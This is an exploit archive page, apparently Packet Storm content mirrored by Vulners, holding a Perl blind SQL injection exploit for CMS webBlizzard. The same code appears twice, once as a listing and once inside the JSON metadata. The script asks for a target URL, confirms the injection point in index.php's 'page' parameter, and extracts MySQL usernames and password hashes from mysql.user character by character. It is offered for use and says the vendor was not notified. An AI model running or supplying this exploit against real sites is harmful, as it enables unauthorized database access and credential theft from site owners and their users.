Search...

cmswebblizzard-sql.txt

2008-07-10T00:00:00

ID PACKETSTORM:67982
Type packetstorm
Reporter Bl@ckbe@rd
Modified 2008-07-10T00:00:00

Description

                                        
                                            `#/usr/bin/perl  
  
#|+| Vendor Not Notified  
#|+| Author: Bl@ckbe@rD  
#|+| Discovered On: 10 june 2008  
#|+| greetz: InjEctOrs , underz0ne crew   
#--//--&gt;  
# -- CMS webBlizzard Blind SQL Injection Exploit --  
#--//--&gt; Exploit :  
use strict;  
use LWP::Simple;  
  
print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n";  
print "- -\n";  
print "- -\n";  
print "- -\n";  
print "- CMS WebBlizzard Blind SQL Injection exploit -\n";  
print "- -\n";  
print "- -\n";  
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n";  
  
print "\nEnter URL (ie: http://site.com): ";  
chomp(my $url=&lt;STDIN&gt;);  
  
if(inject_test($url)) {  
print "Injecting.. Please Wait this could take several minutes..\n\n";  
my $details = blind($url);  
print "Exploit Success! Admin Details: ".$details;  
exit;  
}  
  
sub blind {  
  
my $url = shift;  
my $res = undef;  
my $chr = 48;  
my $substr = 1;  
my $done = 1;  
  
while($done) {  
my $content = get($url."/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM   
mysql.user),".$substr.",1))=".$chr."/*");  
  
if($content =~ /Previous/ && $chr == 94) { $done = 0; }  
elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }  
else { $chr++; }  
}  
return $res;  
}  
  
sub inject_test {  
  
my $url = shift;  
my $true = get($url."/index.php?page=6) and 1=1 /*");  
my $false = get($url."/index.php?page=6) and 1=2 /*");  
  
if($true =~ /Previous/ && $false !~ /Previous/) {  
print "\nTarget Site Vulnerable!\n\n";  
return 1;  
} else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }  
}  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:67982", "type": "packetstorm", "bulletinFamily": "exploit", "title": "cmswebblizzard-sql.txt", "description": "", "published": "2008-07-10T00:00:00", "modified": "2008-07-10T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/67982/cmswebblizzard-sql.txt.html", "reporter": "Bl@ckbe@rd", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:26", "viewCount": 1, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:20:26", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:26", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/67982/cmswebblizzard-sql.txt", "sourceData": "`#/usr/bin/perl \n \n#|+| Vendor Not Notified \n#|+| Author: Bl@ckbe@rD \n#|+| Discovered On: 10 june 2008 \n#|+| greetz: InjEctOrs , underz0ne crew \n#--//--> \n# -- CMS webBlizzard Blind SQL Injection Exploit -- \n#--//--> Exploit : \nuse strict; \nuse LWP::Simple; \n \nprint \"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\\n\"; \nprint \"- -\\n\"; \nprint \"- -\\n\"; \nprint \"- -\\n\"; \nprint \"- CMS WebBlizzard Blind SQL Injection exploit -\\n\"; \nprint \"- -\\n\"; \nprint \"- -\\n\"; \nprint \"+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\\n\"; \n \nprint \"\\nEnter URL (ie: http://site.com): \"; \nchomp(my $url=<STDIN>); \n \nif(inject_test($url)) { \nprint \"Injecting.. Please Wait this could take several minutes..\\n\\n\"; \nmy $details = blind($url); \nprint \"Exploit Success! Admin Details: \".$details; \nexit; \n} \n \nsub blind { \n \nmy $url = shift; \nmy $res = undef; \nmy $chr = 48; \nmy $substr = 1; \nmy $done = 1; \n \nwhile($done) { \nmy $content = get($url.\"/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM \nmysql.user),\".$substr.\",1))=\".$chr.\"/*\"); \n \nif($content =~ /Previous/ && $chr == 94) { $done = 0; } \nelsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; } \nelse { $chr++; } \n} \nreturn $res; \n} \n \nsub inject_test { \n \nmy $url = shift; \nmy $true = get($url.\"/index.php?page=6) and 1=1 /*\"); \nmy $false = get($url.\"/index.php?page=6) and 1=2 /*\"); \n \nif($true =~ /Previous/ && $false !~ /Previous/) { \nprint \"\\nTarget Site Vulnerable!\\n\\n\"; \nreturn 1; \n} else { print \"\\nTarget Site Not Vulnerable! Exiting..\\n\"; exit; } \n} \n`\n"}